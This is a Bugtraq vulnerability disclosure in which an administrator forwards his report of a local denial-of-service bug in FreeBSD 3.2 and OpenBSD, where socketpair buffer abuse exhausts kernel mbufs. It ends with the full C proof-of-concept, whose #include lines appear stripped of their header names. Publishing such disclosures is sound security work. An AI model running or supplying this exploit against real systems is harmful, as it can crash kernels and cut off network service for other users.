Subject: Local DoS on network by unpriviledged user using setsockopt() To: BUGTRAQ@SECURITYFOCUS.COM Recently, I mailed this mailing to a number of people who are concerned with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The mailing was NOT intended to be made public, but somehow it was. Here is my original mailing: --- Forwarded --- I stumbled across a denial of service attack on FreeBSD systems, where an unpriviledged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too: FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions. OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend. NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD. As far as I'm concerned, this can be handled quietly and without much haste. Knowledge of this problem is limited and there is absolutely no intention of publishing this exploit or messages to Bugtraq. With kind regards, Sven Berkvens (sven@ilse.nl) Long time FreeBSD-system administrator The source code for the program that causes this: #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } ----- End forwarded message -----